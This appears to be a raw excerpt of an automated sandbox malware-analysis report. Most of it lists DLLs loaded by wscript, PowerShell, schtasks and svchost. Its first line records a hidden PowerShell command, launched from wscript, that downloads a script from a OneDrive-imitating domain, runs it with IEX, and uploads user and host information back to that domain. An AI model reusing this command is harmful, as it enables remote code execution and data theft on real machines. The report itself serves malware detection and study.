              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: e.pdb source: powershell.exe, 00000000.00000002.1900173496.000001B6FA7A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000005.00000002.2769404987.000002536A4DB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kem.pdbE source: powershell.exe, 00000000.00000002.1901146654.000001B6FA7C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.pdbpdbtem.pdbdo source: powershell.exe, 00000012.00000002.4197164578.000001ABEE18D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Core.pdb= source: powershell.exe, 00000012.00000002.4197164578.000001ABEE18D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2769404987.000002536A508000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2769404987.000002536A4DB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4194744188.000001ABEDEA1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4197164578.000001ABEE16A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@/) source: powershell.exe, 00000005.00000002.2771031189.000002536A6A0000.00000004.00000020.00020000.00000000.sdmp
